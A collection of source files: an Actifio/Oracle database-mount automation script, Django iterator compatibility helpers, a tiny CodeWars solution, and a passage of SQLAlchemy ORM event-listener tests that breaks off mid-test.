# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import re
import logging
import time
import signal
import subprocess
from ptyprocess import PtyProcessUnicode
try:
    from Actifio import Actifio
except ImportError:
    # ``raise ("...")`` is invalid in Python 3 (exceptions must derive from
    # BaseException); re-raise a proper exception instance instead.
    raise ImportError("Unable to import actifio module.")
try:
    from jinja2 import Template
except ImportError:
    raise ImportError("Unable to import jinja2 Template.")
# this section extracts parameters from environment variables
act_appliance = os.environ.get('ACT_APPLIANCE')
act_user = os.environ.get('ACT_USER')
act_pass = os.environ.get('ACT_PASS')
act_appname = os.environ.get('ACT_APPNAME')
act_srchost = os.environ.get('ACT_SRCHOST')
act_targetsid = os.environ.get('ORACLE_SID')
act_orahome = os.environ.get('ORACLE_HOME')
act_orauser = os.environ.get('ORACLE_USER')
act_tnsadmin = os.environ.get('TNS_ADMIN')
myhostname = os.environ.get('HOSTNAME')
############################################################
# Fill in defaults for the optional settings.
if act_orauser is None:
    act_orauser = "oracle"
if act_tnsadmin is None:
    act_tnsadmin = act_orahome + "/network/admin"
# start oracle listner
lsnrctl_j2 = Template("su - {{ orauser }} -c 'ORACLE_HOME={{ orahome }} lsnrctl start'")
lsnrctl_start_cmd = lsnrctl_j2.render(orauser=act_orauser, orahome=act_orahome)
os.system(lsnrctl_start_cmd)
# define a appliance instance
appliance = Actifio(act_appliance, act_user, act_pass, verbose=True)
# look up the oracle app
oraapps = appliance.get_applications(appname=act_appname, hostname=act_srchost, appclass="Oracle")
if len(oraapps) != 1:
    # NOTE: original code did ``raise ("...")`` which is a TypeError under
    # Python 3; raise a real exception with the same message.
    raise RuntimeError("ERROR: not expecting to filter more than one application")
# greb the target host from /act/config
hostid = re.compile(r'^HostId\s+=\s+(.*)$')
hostuniqname = None
try:
    with open("/act/config/connector.conf") as configfile:
        for line in configfile:
            hostname_match = hostid.search(line)
            if hostname_match is not None:
                hostuniqname = hostname_match.group(1)
                break
except IOError:
    raise IOError("ERROR: /act/config/connector.conf is not found. Have you bind mount /act?")
# lookfor a target host
targethosts = appliance.get_hosts(uniquename=hostuniqname)
if len(targethosts) != 1:
    raise RuntimeError("ERROR: returned hosts are not equal to 1")
job, image = appliance.simple_mount(source_application=oraapps[0], target_host=targethosts[0], label="DOCKER CONTAINER")
# Poll until the mount job finishes.
while job.status == "running":
    time.sleep(10)
    job.refresh()
# now the job is complete
# handle to cleanup
mountedimage = None
for img in job.sourceid.split(","):
    mounted_image = appliance.get_images(backupname=img)
    if mounted_image[0].jobclass == "mount":
        mountedimage = mounted_image[0]
# find the mount point
act_datamount = None
act_lsmount = None
for folder in os.listdir("/act/mnt/"):
    if os.path.isdir("/act/mnt/" + folder) and (job.jobname in folder):
        if os.path.isdir("/act/mnt/" + folder + "/datafile"):
            act_datamount = "/act/mnt/" + folder
        elif os.path.isdir("/act/mnt/" + folder + "/archivelog"):
            act_lsmount = "/act/mnt/" + folder
if act_datamount is None:
    # Previously this fell through to a NameError when rendering the template.
    raise RuntimeError("ERROR: no datafile mount point found under /act/mnt")
# run the oracle mount script
appaware_command_j2 = Template("echo Y | su - {{ orauser }} -c 'databasesid={{ orasid }};export databasesid;db_recovery_file_dest_size=50000;export db_recovery_file_dest_size;nonid=FALSE;export nonid;orahome={{ orahome }};export orahome;processes=500;export processes;redosize=500;export redosize;rrecovery=TRUE;export rrecovery;standalone=FALSE;export standalone;tnsadmindir={{ tnsadminpath }};export tnsadmindir;username={{ orauser }};export username;isrestore=false;export isrestore;isgrandchild=false;export isgrandchild;isremount=false;export isremount;imageLogOffset=1;export imageLogOffset;ischild=false;export ischild;opname=mount;export opname;/act/act_scripts/oracleclone/OracleAppMount.sh {{ orasid }} {{ orahome }} {{ datamount}}'")
appaware_command = appaware_command_j2.render(orauser=act_orauser, orasid=act_targetsid, orahome=act_orahome,
                                              tnsadminpath=act_tnsadmin, datamount=act_datamount)
with open("/script/run.sh", "w") as script:
    script.write("echo $TERM\n")
    script.write("export TERM=xterm\n")
    script.write("stty -a\n")
    script.write("tty\n")
    script.write("who\n")
    script.write("set +x\n")
    script.write(appaware_command)
# spin up in a subprocesses
pid = os.fork()
if pid == 0:
    # Child: wait forever; on SIGINT/SIGTERM abort Oracle and unmount.
    abort_oracle_j2 = Template("su - {{ orauser }} -c 'kill -9 -1'")
    abort_oracle = abort_oracle_j2.render(orauser=act_orauser)
    def unmountthemount(SignNum, frame):
        os.system(abort_oracle)
        appliance.unmount_image(image=mountedimage)
    # register for the signals
    signal.signal(signal.SIGINT, unmountthemount)
    signal.signal(signal.SIGTERM, unmountthemount)
    while True:
        time.sleep(60)
else:
    # ignore all the signals... let oracle deal with them
    for sig in signal.Signals:
        print(sig)
        # SIGKILL and SIGSTOP cannot be caught or ignored; attempting to
        # install a handler for them raises, so skip them (the original
        # only skipped SIGKILL and crashed on SIGSTOP).
        if sig not in (signal.SIGKILL, signal.SIGSTOP):
            try:
                signal.signal(sig, signal.SIG_IGN)
            except (OSError, ValueError, RuntimeError):
                # Some platform-specific signals still refuse handlers.
                pass
    # run with a terminal
    script_proc = PtyProcessUnicode.spawn(["bash", "/script/run.sh"])
    while True:
        print(script_proc.readline())
|
leopittelli/Django-on-App-Engine-Example | refs/heads/master | django/utils/itercompat.py | 113 | """
Providing iterator functions that are not in all version of Python we support.
Where possible, we try to use the system-native version and only fall back to
these implementations if necessary.
"""
import collections
import itertools
import sys
import warnings
def is_iterable(x):
    """Return True if ``x`` can be iterated over, False otherwise.

    Implementation-independent: simply asks the iterator protocol.
    """
    try:
        iter(x)
    except TypeError:
        return False
    return True
def is_iterator(x):
    """An implementation independent way of checking for iterators

    Python 2.6 has a different implementation of collections.Iterator which
    accepts anything with a `next` method. 2.7+ requires and `__iter__` method
    as well.
    """
    # ``collections.Iterator`` (an alias of ``collections.abc.Iterator``)
    # was removed in Python 3.10; prefer collections.abc with a fallback
    # for interpreters that predate it.
    try:
        from collections.abc import Iterator
    except ImportError:  # Python < 3.3
        from collections import Iterator
    if sys.version_info >= (2, 7):
        return isinstance(x, Iterator)
    return isinstance(x, Iterator) and hasattr(x, '__iter__')
def product(*args, **kwds):
    """Deprecated thin wrapper around :func:`itertools.product`."""
    message = "django.utils.itercompat.product is deprecated; use the native version instead"
    warnings.warn(message, DeprecationWarning, stacklevel=2)
    return itertools.product(*args, **kwds)
|
VladKha/CodeWars | refs/heads/master | 8 kyu/Man in the west/solve.py | 1 | def check_the_bucket(bucket):
return 'gold' in bucket
|
pdufour/sqlalchemy | refs/heads/master | test/orm/test_events.py | 9 | from sqlalchemy.testing import assert_raises_message, assert_raises
import sqlalchemy as sa
from sqlalchemy import testing
from sqlalchemy import Integer, String
from sqlalchemy.testing.schema import Table, Column
from sqlalchemy.orm import mapper, relationship, \
create_session, class_mapper, \
Mapper, column_property, query, \
Session, sessionmaker, attributes, configure_mappers
from sqlalchemy.orm.instrumentation import ClassManager
from sqlalchemy.orm import instrumentation, events
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing.util import gc_collect
from test.orm import _fixtures
from sqlalchemy import event
from sqlalchemy.testing.mock import Mock, call, ANY
class _RemoveListeners(object):
    # Test mixin: wipe every ORM-level event registry after each test so
    # listeners installed by one test cannot leak into the next.
    def teardown(self):
        events.MapperEvents._clear()
        events.InstanceEvents._clear()
        events.SessionEvents._clear()
        events.InstrumentationEvents._clear()
        events.QueryEvents._clear()
        super(_RemoveListeners, self).teardown()
class MapperEventsTest(_RemoveListeners, _fixtures.FixtureTest):
    """Exercise MapperEvents / InstanceEvents listeners: registration
    targets, propagation to subclasses, insert ordering, and the event
    sequence fired across a full CRUD lifecycle."""
    run_inserts = None
    @classmethod
    def define_tables(cls, metadata):
        super(MapperEventsTest, cls).define_tables(metadata)
        metadata.tables['users'].append_column(
            Column('extra', Integer, default=5, onupdate=10)
        )
    def test_instance_event_listen(self):
        """test listen targets for instance events"""
        users, addresses = self.tables.users, self.tables.addresses
        canary = []
        class A(object):
            pass
        class B(A):
            pass
        mapper(A, users)
        mapper(B, addresses, inherits=A,
               properties={'address_id': addresses.c.id})
        def init_a(target, args, kwargs):
            canary.append(('init_a', target))
        def init_b(target, args, kwargs):
            canary.append(('init_b', target))
        def init_c(target, args, kwargs):
            canary.append(('init_c', target))
        def init_d(target, args, kwargs):
            canary.append(('init_d', target))
        def init_e(target, args, kwargs):
            canary.append(('init_e', target))
        # Five distinct listen targets: mapper() function, Mapper class,
        # a Mapper instance, a mapped class, and a mapped class w/ propagate.
        event.listen(mapper, 'init', init_a)
        event.listen(Mapper, 'init', init_b)
        event.listen(class_mapper(A), 'init', init_c)
        event.listen(A, 'init', init_d)
        event.listen(A, 'init', init_e, propagate=True)
        a = A()
        eq_(canary, [('init_a', a), ('init_b', a),
                     ('init_c', a), ('init_d', a), ('init_e', a)])
        # test propagate flag
        canary[:] = []
        b = B()
        eq_(canary, [('init_a', b), ('init_b', b), ('init_e', b)])
    def listen_all(self, mapper, **kw):
        # Helper: hook every lifecycle event on the target and record the
        # event names, in firing order, into the returned list.
        canary = []
        def evt(meth):
            def go(*args, **kwargs):
                canary.append(meth)
            return go
        for meth in [
            'init',
            'init_failure',
            'load',
            'refresh',
            'refresh_flush',
            'expire',
            'before_insert',
            'after_insert',
            'before_update',
            'after_update',
            'before_delete',
            'after_delete'
        ]:
            event.listen(mapper, meth, evt(meth), **kw)
        return canary
    def test_listen_doesnt_force_compile(self):
        User, users = self.classes.User, self.tables.users
        m = mapper(User, users, properties={
            # intentionally broken relationship(), will not be resolved
            'addresses': relationship(lambda: ImNotAClass)
        })
        event.listen(User, "before_insert", lambda *a, **kw: None)
        assert not m.configured
    def test_basic(self):
        User, users = self.classes.User, self.tables.users
        mapper(User, users)
        canary = self.listen_all(User)
        named_canary = self.listen_all(User, named=True)
        sess = create_session()
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        sess.expire(u)
        u = sess.query(User).get(u.id)
        sess.expunge_all()
        u = sess.query(User).get(u.id)
        u.name = 'u1 changed'
        sess.flush()
        sess.delete(u)
        sess.flush()
        expected = [
            'init', 'before_insert',
            'refresh_flush',
            'after_insert', 'expire',
            'refresh',
            'load',
            'before_update', 'refresh_flush', 'after_update', 'before_delete',
            'after_delete']
        eq_(canary, expected)
        eq_(named_canary, expected)
    def test_insert_before_configured(self):
        users, User = self.tables.users, self.classes.User
        mapper(User, users)
        canary = Mock()
        event.listen(mapper, "before_configured", canary.listen1)
        event.listen(mapper, "before_configured", canary.listen2, insert=True)
        event.listen(mapper, "before_configured", canary.listen3)
        event.listen(mapper, "before_configured", canary.listen4, insert=True)
        configure_mappers()
        # insert=True listeners fire first, in reverse registration order.
        eq_(
            canary.mock_calls,
            [call.listen4(), call.listen2(), call.listen1(), call.listen3()]
        )
    def test_insert_flags(self):
        users, User = self.tables.users, self.classes.User
        m = mapper(User, users)
        canary = Mock()
        arg = Mock()
        event.listen(m, "before_insert", canary.listen1, )
        event.listen(m, "before_insert", canary.listen2, insert=True)
        event.listen(m, "before_insert", canary.listen3, propagate=True, insert=True)
        event.listen(m, "load", canary.listen4)
        event.listen(m, "load", canary.listen5, insert=True)
        event.listen(m, "load", canary.listen6, propagate=True, insert=True)
        u1 = User()
        state = u1._sa_instance_state
        m.dispatch.before_insert(arg, arg, arg)
        m.class_manager.dispatch.load(arg, arg)
        eq_(
            canary.mock_calls,
            [
                call.listen3(arg, arg, arg.obj()),
                call.listen2(arg, arg, arg.obj()),
                call.listen1(arg, arg, arg.obj()),
                call.listen6(arg.obj(), arg),
                call.listen5(arg.obj(), arg),
                call.listen4(arg.obj(), arg)
            ]
        )
    def test_merge(self):
        users, User = self.tables.users, self.classes.User
        mapper(User, users)
        canary = []
        def load(obj, ctx):
            canary.append('load')
        event.listen(mapper, 'load', load)
        s = Session()
        u = User(name='u1')
        s.add(u)
        s.commit()
        s = Session()
        u2 = s.merge(u)
        s = Session()
        u2 = s.merge(User(name='u2'))  # noqa
        s.commit()
        s.query(User).order_by(User.id).first()
        eq_(canary, ['load', 'load', 'load'])
    def test_inheritance(self):
        users, addresses, User = (self.tables.users,
                                  self.tables.addresses,
                                  self.classes.User)
        class AdminUser(User):
            pass
        mapper(User, users)
        mapper(AdminUser, addresses, inherits=User,
               properties={'address_id': addresses.c.id})
        canary1 = self.listen_all(User, propagate=True)
        canary2 = self.listen_all(User)
        canary3 = self.listen_all(AdminUser)
        sess = create_session()
        am = AdminUser(name='au1', email_address='au1@e1')
        sess.add(am)
        sess.flush()
        am = sess.query(AdminUser).populate_existing().get(am.id)
        sess.expunge_all()
        am = sess.query(AdminUser).get(am.id)
        am.name = 'au1 changed'
        sess.flush()
        sess.delete(am)
        sess.flush()
        # propagate=True listeners see subclass events; plain base-class
        # listeners (canary2) see nothing for AdminUser instances.
        eq_(canary1, ['init', 'before_insert', 'refresh_flush', 'after_insert',
                      'refresh', 'load',
                      'before_update', 'refresh_flush',
                      'after_update', 'before_delete',
                      'after_delete'])
        eq_(canary2, [])
        eq_(canary3, ['init', 'before_insert', 'refresh_flush', 'after_insert',
                      'refresh',
                      'load',
                      'before_update', 'refresh_flush',
                      'after_update', 'before_delete',
                      'after_delete'])
    def test_inheritance_subclass_deferred(self):
        users, addresses, User = (self.tables.users,
                                  self.tables.addresses,
                                  self.classes.User)
        mapper(User, users)
        # listeners registered BEFORE the subclass is mapped
        canary1 = self.listen_all(User, propagate=True)
        canary2 = self.listen_all(User)
        class AdminUser(User):
            pass
        mapper(AdminUser, addresses, inherits=User,
               properties={'address_id': addresses.c.id})
        canary3 = self.listen_all(AdminUser)
        sess = create_session()
        am = AdminUser(name='au1', email_address='au1@e1')
        sess.add(am)
        sess.flush()
        am = sess.query(AdminUser).populate_existing().get(am.id)
        sess.expunge_all()
        am = sess.query(AdminUser).get(am.id)
        am.name = 'au1 changed'
        sess.flush()
        sess.delete(am)
        sess.flush()
        eq_(canary1, ['init', 'before_insert', 'refresh_flush', 'after_insert',
                      'refresh', 'load',
                      'before_update', 'refresh_flush',
                      'after_update', 'before_delete',
                      'after_delete'])
        eq_(canary2, [])
        eq_(canary3, ['init', 'before_insert', 'refresh_flush', 'after_insert',
                      'refresh', 'load',
                      'before_update', 'refresh_flush',
                      'after_update', 'before_delete',
                      'after_delete'])
    def test_before_after_only_collection(self):
        """before_update is called on parent for collection modifications,
        after_update is called even if no columns were updated.
        """
        keywords, items, item_keywords, Keyword, Item = (
            self.tables.keywords,
            self.tables.items,
            self.tables.item_keywords,
            self.classes.Keyword,
            self.classes.Item)
        mapper(Item, items, properties={
            'keywords': relationship(Keyword, secondary=item_keywords)})
        mapper(Keyword, keywords)
        canary1 = self.listen_all(Item)
        canary2 = self.listen_all(Keyword)
        sess = create_session()
        i1 = Item(description="i1")
        k1 = Keyword(name="k1")
        sess.add(i1)
        sess.add(k1)
        sess.flush()
        eq_(canary1,
            ['init',
             'before_insert', 'after_insert'])
        eq_(canary2,
            ['init',
             'before_insert', 'after_insert'])
        canary1[:] = []
        canary2[:] = []
        i1.keywords.append(k1)
        sess.flush()
        eq_(canary1, ['before_update', 'after_update'])
        eq_(canary2, [])
    def test_before_after_configured_warn_on_non_mapper(self):
        User, users = self.classes.User, self.tables.users
        m1 = Mock()
        mapper(User, users)
        assert_raises_message(
            sa.exc.SAWarning,
            "before_configured' and 'after_configured' ORM events only "
            "invoke with the mapper\(\) function or Mapper class as "
            "the target.",
            event.listen, User, 'before_configured', m1
        )
        assert_raises_message(
            sa.exc.SAWarning,
            "before_configured' and 'after_configured' ORM events only "
            "invoke with the mapper\(\) function or Mapper class as "
            "the target.",
            event.listen, User, 'after_configured', m1
        )
    def test_before_after_configured(self):
        User, users = self.classes.User, self.tables.users
        m1 = Mock()
        m2 = Mock()
        mapper(User, users)
        event.listen(mapper, "before_configured", m1)
        event.listen(mapper, "after_configured", m2)
        s = Session()
        s.query(User)
        eq_(m1.mock_calls, [call()])
        eq_(m2.mock_calls, [call()])
    def test_instrument_event(self):
        Address, addresses, users, User = (self.classes.Address,
                                           self.tables.addresses,
                                           self.tables.users,
                                           self.classes.User)
        canary = []
        def instrument_class(mapper, cls):
            canary.append(cls)
        event.listen(Mapper, 'instrument_class', instrument_class)
        mapper(User, users)
        eq_(canary, [User])
        mapper(Address, addresses)
        eq_(canary, [User, Address])
    def test_instrument_class_precedes_class_instrumentation(self):
        users = self.tables.users
        class MyClass(object):
            pass
        canary = Mock()
        def my_init(self):
            canary.init()
        # mapper level event
        @event.listens_for(mapper, "instrument_class")
        def instrument_class(mp, class_):
            canary.instrument_class(class_)
            class_.__init__ = my_init
        # instrumentationmanager event
        @event.listens_for(object, "class_instrument")
        def class_instrument(class_):
            canary.class_instrument(class_)
        mapper(MyClass, users)
        m1 = MyClass()
        assert attributes.instance_state(m1)
        eq_(
            [
                call.instrument_class(MyClass),
                call.class_instrument(MyClass),
                call.init()
            ],
            canary.mock_calls
        )
class DeclarativeEventListenTest(_RemoveListeners,
                                 fixtures.DeclarativeMappedTest):
    """Verify that events registered on a declarative base propagate to
    subclasses mapped both before and after registration."""
    run_setup_classes = "each"
    run_deletes = None
    def test_inheritance_propagate_after_config(self):
        # test [ticket:2949]
        class A(self.DeclarativeBasic):
            __tablename__ = 'a'
            id = Column(Integer, primary_key=True)
        class B(A):
            pass
        listen = Mock()
        event.listen(self.DeclarativeBasic, "load", listen, propagate=True)
        # C is mapped AFTER the listener is registered; it must still fire.
        class C(B):
            pass
        m1 = A.__mapper__.class_manager
        m2 = B.__mapper__.class_manager
        m3 = C.__mapper__.class_manager
        a1 = A()
        b1 = B()
        c1 = C()
        m3.dispatch.load(c1._sa_instance_state, "c")
        m2.dispatch.load(b1._sa_instance_state, "b")
        m1.dispatch.load(a1._sa_instance_state, "a")
        eq_(
            listen.mock_calls,
            [call(c1, "c"), call(b1, "b"), call(a1, "a")]
        )
class DeferredMapperEventsTest(_RemoveListeners, _fixtures.FixtureTest):
    """Test event listeners against unmapped classes.
    This incurs special logic. Note if we ever do the "remove" case,
    it has to get all of these, too.
    """
    run_inserts = None
    def test_deferred_map_event(self):
        """
        1. mapper event listen on class
        2. map class
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        canary = []
        def evt(x, y, z):
            canary.append(x)
        # raw=True: the listener is invoked with the dispatch arguments
        # exactly as given (the integer stand-ins below)
        event.listen(User, "before_insert", evt, raw=True)
        m = mapper(User, users)
        m.dispatch.before_insert(5, 6, 7)
        eq_(canary, [5])
    def test_deferred_map_event_subclass_propagate(self):
        """
        1. mapper event listen on class, w propagate
        2. map only subclass of class
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        class SubSubUser(SubUser):
            pass
        canary = Mock()
        # NOTE(review): 'evt' is never used — the Mock 'canary' is what is
        # registered below; looks like leftover from a list-based version
        # of this test.
        def evt(x, y, z):
            canary.append(x)
        event.listen(User, "before_insert", canary, propagate=True, raw=True)
        m = mapper(SubUser, users)
        m.dispatch.before_insert(5, 6, 7)
        eq_(canary.mock_calls,
            [call(5, 6, 7)])
        # a deeper subclass mapped later still picks up the propagated
        # listener
        m2 = mapper(SubSubUser, users)
        m2.dispatch.before_insert(8, 9, 10)
        eq_(canary.mock_calls,
            [call(5, 6, 7), call(8, 9, 10)])
    def test_deferred_map_event_subclass_no_propagate(self):
        """
        1. mapper event listen on class, w/o propagate
        2. map only subclass of class
        3. event fire should not receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        canary = []
        def evt(x, y, z):
            canary.append(x)
        event.listen(User, "before_insert", evt, propagate=False)
        m = mapper(SubUser, users)
        m.dispatch.before_insert(5, 6, 7)
        eq_(canary, [])
    def test_deferred_map_event_subclass_post_mapping_propagate(self):
        """
        1. map only subclass of class
        2. mapper event listen on class, w propagate
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        m = mapper(SubUser, users)
        canary = []
        def evt(x, y, z):
            canary.append(x)
        event.listen(User, "before_insert", evt, propagate=True, raw=True)
        m.dispatch.before_insert(5, 6, 7)
        eq_(canary, [5])
    def test_deferred_map_event_subclass_post_mapping_propagate_two(self):
        """
        1. map only subclass of class
        2. mapper event listen on class, w propagate
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        class SubSubUser(SubUser):
            pass
        m = mapper(SubUser, users)
        canary = Mock()
        event.listen(User, "before_insert", canary, propagate=True, raw=True)
        m2 = mapper(SubSubUser, users)
        m.dispatch.before_insert(5, 6, 7)
        eq_(canary.mock_calls, [call(5, 6, 7)])
        m2.dispatch.before_insert(8, 9, 10)
        eq_(canary.mock_calls, [call(5, 6, 7), call(8, 9, 10)])
    def test_deferred_instance_event_subclass_post_mapping_propagate(self):
        """
        1. map only subclass of class
        2. instance event listen on class, w propagate
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        m = mapper(SubUser, users)
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "load", evt, propagate=True, raw=True)
        m.class_manager.dispatch.load(5)
        eq_(canary, [5])
    def test_deferred_instance_event_plain(self):
        """
        1. instance event listen on class, w/o propagate
        2. map class
        3. event fire should receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "load", evt, raw=True)
        m = mapper(User, users)
        m.class_manager.dispatch.load(5)
        eq_(canary, [5])
    def test_deferred_instance_event_subclass_propagate_subclass_only(self):
        """
        1. instance event listen on class, w propagate
        2. map two subclasses of class
        3. event fire on each class should receive one and only one event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        class SubUser2(User):
            pass
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "load", evt, propagate=True, raw=True)
        m = mapper(SubUser, users)
        m2 = mapper(SubUser2, users)
        m.class_manager.dispatch.load(5)
        eq_(canary, [5])
        m2.class_manager.dispatch.load(5)
        eq_(canary, [5, 5])
    def test_deferred_instance_event_subclass_propagate_baseclass(self):
        """
        1. instance event listen on class, w propagate
        2. map one subclass of class, map base class, leave 2nd subclass
        unmapped
        3. event fire on sub should receive one and only one event
        4. event fire on base should receive one and only one event
        5. map 2nd subclass
        6. event fire on 2nd subclass should receive one and only one event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        class SubUser2(User):
            pass
        canary = Mock()
        # raw=False: the listener receives state.obj() rather than the
        # state itself — hence instance.obj() in the assertions below
        event.listen(User, "load", canary, propagate=True, raw=False)
        # reversing these fixes....
        m = mapper(SubUser, users)
        m2 = mapper(User, users)
        instance = Mock()
        m.class_manager.dispatch.load(instance)
        eq_(canary.mock_calls, [call(instance.obj())])
        m2.class_manager.dispatch.load(instance)
        eq_(canary.mock_calls, [call(instance.obj()), call(instance.obj())])
        m3 = mapper(SubUser2, users)
        m3.class_manager.dispatch.load(instance)
        eq_(canary.mock_calls, [call(instance.obj()),
                                call(instance.obj()), call(instance.obj())])
    def test_deferred_instance_event_subclass_no_propagate(self):
        """
        1. instance event listen on class, w/o propagate
        2. map subclass
        3. event fire on subclass should not receive event
        """
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "load", evt, propagate=False)
        m = mapper(SubUser, users)
        m.class_manager.dispatch.load(5)
        eq_(canary, [])
    def test_deferred_instrument_event(self):
        # attribute_instrument listener on an unmapped class fires when
        # the instrumentation factory dispatches for that class
        User = self.classes.User
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "attribute_instrument", evt)
        instrumentation._instrumentation_factory.\
            dispatch.attribute_instrument(User)
        eq_(canary, [User])
    def test_isolation_instrument_event(self):
        # a listener on an unrelated class receives nothing for User
        User = self.classes.User
        class Bar(object):
            pass
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(Bar, "attribute_instrument", evt)
        instrumentation._instrumentation_factory.dispatch.\
            attribute_instrument(User)
        eq_(canary, [])
    @testing.requires.predictable_gc
    def test_instrument_event_auto_remove(self):
        # the deferred listener collection is cleaned out once the target
        # class is garbage collected
        class Bar(object):
            pass
        dispatch = instrumentation._instrumentation_factory.dispatch
        assert not dispatch.attribute_instrument
        event.listen(Bar, "attribute_instrument", lambda: None)
        eq_(len(dispatch.attribute_instrument), 1)
        del Bar
        gc_collect()
        assert not dispatch.attribute_instrument
    def test_deferred_instrument_event_subclass_propagate(self):
        User = self.classes.User
        class SubUser(User):
            pass
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "attribute_instrument", evt, propagate=True)
        instrumentation._instrumentation_factory.dispatch.\
            attribute_instrument(SubUser)
        eq_(canary, [SubUser])
    def test_deferred_instrument_event_subclass_no_propagate(self):
        users, User = (self.tables.users,
                       self.classes.User)
        class SubUser(User):
            pass
        canary = []
        def evt(x):
            canary.append(x)
        event.listen(User, "attribute_instrument", evt, propagate=False)
        mapper(SubUser, users)
        instrumentation._instrumentation_factory.dispatch.\
            attribute_instrument(5)
        eq_(canary, [])
class LoadTest(_fixtures.FixtureTest):
    """Test that the 'load' instance event fires once per newly loaded
    object, even when the same row appears more than once in a result.
    """
    run_inserts = None
    @classmethod
    def setup_mappers(cls):
        mapper(cls.classes.User, cls.tables.users)
    def _fixture(self):
        # Register load/refresh listeners on User; every event fired is
        # recorded, in order, into the returned list.
        recorded = []
        def on_load(target, ctx):
            recorded.append("load")
        def on_refresh(target, ctx, attrs):
            recorded.append(("refresh", attrs))
        user_cls = self.classes.User
        event.listen(user_cls, "load", on_load)
        event.listen(user_cls, "refresh", on_refresh)
        return recorded
    def test_just_loaded(self):
        # a plain query of a freshly-persisted row emits exactly one 'load'
        user_cls = self.classes.User
        recorded = self._fixture()
        session = Session()
        session.add(user_cls(name='u1'))
        session.commit()
        session.close()
        session.query(user_cls).first()
        eq_(recorded, ['load'])
    def test_repeated_rows(self):
        # the same row returned twice via UNION ALL still loads only once
        user_cls = self.classes.User
        recorded = self._fixture()
        session = Session()
        session.add(user_cls(name='u1'))
        session.commit()
        session.close()
        session.query(user_cls).union_all(session.query(user_cls)).all()
        eq_(recorded, ['load'])
class RemovalTest(_fixtures.FixtureTest):
    """Test event.remove() against mapper- and instance-level listeners,
    including listeners established before mapping and propagated ones.
    """
    run_inserts = None
    def test_attr_propagated(self):
        User = self.classes.User
        # NOTE(review): the assignment above is redundant — User is
        # immediately rebound by the tuple unpack below.
        users, addresses, User = (self.tables.users,
                                  self.tables.addresses,
                                  self.classes.User)
        class AdminUser(User):
            pass
        mapper(User, users)
        mapper(AdminUser, addresses, inherits=User,
               properties={'address_id': addresses.c.id})
        fn = Mock()
        event.listen(User.name, "set", fn, propagate=True)
        au = AdminUser()
        au.name = 'ed'
        eq_(fn.call_count, 1)
        # removing at the base class also removes the propagated listener
        # from the subclass: the second set below is not received
        event.remove(User.name, "set", fn)
        au.name = 'jack'
        eq_(fn.call_count, 1)
    def test_unmapped_listen(self):
        users = self.tables.users
        class Foo(object):
            pass
        fn = Mock()
        # listen on the unmapped base; the listener takes effect when a
        # subclass is mapped later
        event.listen(Foo, "before_insert", fn, propagate=True)
        class User(Foo):
            pass
        m = mapper(User, users)
        u1 = User()
        m.dispatch.before_insert(m, None, attributes.instance_state(u1))
        eq_(fn.call_count, 1)
        event.remove(Foo, "before_insert", fn)
        # existing event is removed
        m.dispatch.before_insert(m, None, attributes.instance_state(u1))
        eq_(fn.call_count, 1)
        # the _HoldEvents is also cleaned out
        class Bar(Foo):
            pass
        m = mapper(Bar, users)
        b1 = Bar()
        m.dispatch.before_insert(m, None, attributes.instance_state(b1))
        eq_(fn.call_count, 1)
    def test_instance_event_listen_on_cls_before_map(self):
        users = self.tables.users
        fn = Mock()
        class User(object):
            pass
        # listener attached before the class is mapped at all
        event.listen(User, "load", fn)
        m = mapper(User, users)
        u1 = User()
        m.class_manager.dispatch.load(u1._sa_instance_state, "u1")
        event.remove(User, "load", fn)
        m.class_manager.dispatch.load(u1._sa_instance_state, "u2")
        # only the dispatch prior to remove() was received
        eq_(fn.mock_calls, [call(u1, "u1")])
class RefreshTest(_fixtures.FixtureTest):
    """Test when the 'refresh' event fires (vs. 'load'), across expiration,
    commit, repeated rows and populate_existing.
    """
    run_inserts = None
    @classmethod
    def setup_mappers(cls):
        User, users = cls.classes.User, cls.tables.users
        mapper(User, users)
    def _fixture(self):
        # Record 'load' and ('refresh', <attrs>) events fired for User.
        User = self.classes.User
        canary = []
        def load(target, ctx):
            canary.append("load")
        def refresh(target, ctx, attrs):
            canary.append(("refresh", attrs))
        event.listen(User, "load", load)
        event.listen(User, "refresh", refresh)
        return canary
    def test_already_present(self):
        # an unexpired object already in the session emits neither event
        # when it comes back in a result
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.flush()
        sess.query(User).first()
        eq_(canary, [])
    def test_changes_reset(self):
        """test the contract of load/refresh such that history is reset.
        This has never been an official contract but we are testing it
        here to ensure it is maintained given the loading performance
        enhancements.
        """
        User = self.classes.User
        @event.listens_for(User, "load")
        def canary1(obj, context):
            obj.name = 'new name!'
        @event.listens_for(User, "refresh")
